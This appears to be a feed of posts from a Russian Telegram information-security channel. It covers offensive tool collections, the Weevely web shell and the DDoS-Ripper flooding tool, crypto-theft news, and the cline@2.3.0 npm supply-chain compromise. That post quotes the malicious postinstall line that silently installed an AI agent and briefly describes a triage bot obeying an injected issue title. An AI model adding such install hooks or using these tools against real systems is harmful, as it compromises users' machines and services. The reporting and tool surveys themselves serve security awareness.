В данном репозитории собрали:
– Анонимное сокрытие инструментов
– Инструменты сбора информации
– Генераторы списков слов
– Инструменты беспроводной атаки
– Инструменты для внедрения SQL-запросов
– Инструменты фишинговой атаки
– Инструменты веб-атак
– Инструменты для последующей эксплуатации
– Инструменты судебной экспертизы
– Инструменты для создания полезной нагрузки
– Платформы для использования эксплойтов
– Обратный инжиниринг
– Сканирование веб-страниц
– Инструменты для проведения DDOS-атак
– Инструменты удаленного администратора
(RAT)
– Инструменты XSS-атаки
– Инструменты для стеганографии
Репозиторий постоянно обновляется!
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6❤3👎2😈2
— Сегодня разберем доклад Hacking Washing Machines с конференции 39C3 и посмотрим, как мелкая бытовая неисправность привела к полноценному реверсу стиралки, а затем – к созданию свободной утилиты, которая заменяет закрытый фирменный софт для ремонта техники Miele
Доклад получился объемным, поэтому для удобства читателей он разделен на две части:
1. Первая про опыт исследования техники Miele
2. Второй про шину D-Bus как универсальную отмычку к экосистеме бренда BSH
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥2
— Предлагаем вашему вниманию полное руководство по визуализации на Python
Matplotlib – библиотека на Python для визуализации данных двумерной и трёхмерной графикой
Он имеет отличную поддержку множеством сред, таких, как веб-серверы приложений, графические библиотеки пользовательского интерфейса, Jupiter Notebook, iPython Notebook и оболочка iPython
Выкладывать еще материалы по программированию?💊 – да🗿 – не стоит
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
💊8🙏1
Weevely – это веб-шелл командной строки, динамически распространяемый по сети во время выполнения
Просто закиньте PHP скрипт, и программа обеспечит похожий на ssh терминал даже в ограниченном окружении
— Оставляющий мало следов агент и более 30 модулей формируют расширяемый фреймворк для:
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2
Национальная налоговая служба Южной Кореи (National Tax Service, NTS) отчиталась о результатах операции против 124 крупных неплательщиков налогов
— Для наглядности они решили приложить к своему пресс-релизу фотографии изъятого у неплательщиков имущества
Среди них оказался снимок аппаратного кошелька Ledger, а также на фото попала и рукописная заметка с seed-фразой от него
Результат не заставил себя ждать: спустя пару часасов неизвестные вывели с конфискованного кошелька 4 млн токенов Pre-Retogeum (PRTG), оценивавшихся примерно в 4,8 млн $ на момент кражи
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
😁17❤4🗿2
— Этот цикл статей будет посвящен веб‑серверу Angie
Angie – это современный веб-сервер и обратный прокси с открытым исходным кодом, основанный на веб-сервере Nginx
Проект был инициирован в 2013 году компанией Angie Software с целью улучшить возможности Nginx, а также расширить его функциональность для большего удобства использования в корпоративных и облачных средах
Навигация по циклу:
🗄 Почему стоит переходить на Angie.
🗄 Установка Angie из пакетов и в докере.
🗄 Переезд с Nginx на Angie. Пошаговая инструкция.
🗄 Настройка location в Angie. Разделение динамических и статических запросов.
🗄 Перенаправления в Angie: return, rewrite и примеры их применения.
🗄 Сжатие текста в Angie: статика, динамика, производительность.
🗄 Серверное кэширование в Angie: тонкости настройки.
🗄 Настройка TLS в Angie: безопасность и скорость.
🗄 Настройка Angie в роли обратного HTTP-прокси.
🗄 Балансировка нагрузки для HTTP(S) в Angie.
🗄 Мониторинг Angie с помощью Console Light и API.
🗄 Балансировка и проксирование L4-трафика в Angie.
🗄 Клиентское кэширование в Angie.
🗄 Динамические группы проксируемых серверов в Angie.
🗄 Мониторинг Angie с Prometheus и Grafana.
🗄 Отказоустойчивый кластер Angie с VRRP и Keepalived.
🗄 Контроль доступа в Angie.
🗄 Аутентификация клиентов в Angie с помощью TLS-сертификатов.
🗄 Кастомизация Angie (njs, Lua, Perl).
🗄 Запуск CGI-скриптов в Angie.
🗄 Защита от DoS-атак в Angie стандартными модулями.
🗄 Защита от DoS-атак в Angie (дополнительные средства).
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
Awesome Hacking – это кураторская подборка из более чем 50 тематических списков ресурсов по информационной безопасности
Создатели собрали в одном месте:
Проект насчитывает почти 100 тысяч звезд на GitHub и регулярно обновляется сообществом
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
DDoS-Ripper – инструмент для тестирования сети, который имитирует атаки Distributed Denial of Service (DDoS)
— Он генерирует высокие объёмы HTTP-запросов с одной машины с помощью нескольких параллельных потоков
DDoS-Ripper совместим с несколькими платформами, включая Linux, Windows, MacOS и Termux
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
— Арестован сын правительственного подрядчика США, Джон Дагита, которого обвиняют в хищении более 46 млн долларов в криптовалюте у Службы маршалов
Джон Дагита – сын Дина Дагиты, президента и генерального директора компании Command Services & Support (CMDSS), базирующейся в Вирджинии
«В конце января 2026 года я раскрыл, как Джон украл более 46 млн долларов в конфискованных криптоактивах у правительства США, злоупотребив доступом к ресурсам CMDSS — компании его отца, у которой был контракт со Службой маршалов.
Затем Джон несколько раз дразнил меня через свой Telegram-канал и проводил dust-атаки на мой публичный кошелек, используя украденные средства. Ну и кто смеется теперь, Джон?» — написал известный блокчейн-аналитик ZachXBT
По данным ZachXBT, Дагита сам себя раскрыл во время конфликта с другим злоумышленником в приватном чате Telegram, который был записан
В этой переписке он продемонстрировал, что способен в реальном времени перемещать крупные суммы между двумя криптокошельками
Дальнейший анализ позволил связать эти кошельки с правительственными активами, конфискованными после взлома биржи Bitfinex
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤2
Forwarded from no system is safe // cybersec
Теперь наши каналы доступны не только здесь, но и на платформе MAX. В честь этого события разыгрываем три приза, которые усилят вашу защиту в сети.
ПРИЗОВОЙ ФОНД:
Физический ключ, который делает двухфакторную аутентификацию неуязвимой. Никакой фишинг и слив паролей не страшны, пока ключ у вас.
Полная анонимность и шифрование трафика. Ваши данные под защитой в любых сетях.
Актуальная новинка по активной обороне. Учитесь думать как хакер, чтобы защищаться от реальных угроз.
Быть подписанным на этот канал (где вы читаете пост).
Быть подписанным на все 4 канала в MAX по ссылкам ниже.
→ max.ru/becaps
→ max.ru/cyberins
→ max.ru/itbook_library
→ max.ru/nsis_cybersec
Итоги подведём ровно через 20 дней с помощью рандомайзера 28.03.26 14:00MSK.
Please open Telegram to view this post
VIEW IN TELEGRAM
👎25❤5👍3🤬3💊1
17 февраля в репозитории npm была опубликована версия
cline@2.3.0. С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байтЛишь в файле
package.json притаилась одна лишняя строчка:"postinstall": "npm install -g openclaw@latest"
В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw— Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса – пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа
Но самое поразительное здесь не сама начинка вредоноса – весь фокус в том, как именно злоумышленник раздобыл npm-токен – ключ от всех дверей
Бот, занимавшийся сортировкой заявок, прочитал этот заголовок, принял его за приказ и послушно исполнил
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤2
— Здесь собраны материалы, которые могут быть полезны с практической точки зрения: из них можно узнать о новых способах атак на приложения, прочитать о новых уязвимостях, изучить, как работают механизмы операционной системы и т.д.
Для удобства все материалы, которые есть на русском языке, выделены в подпункты
// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
💊2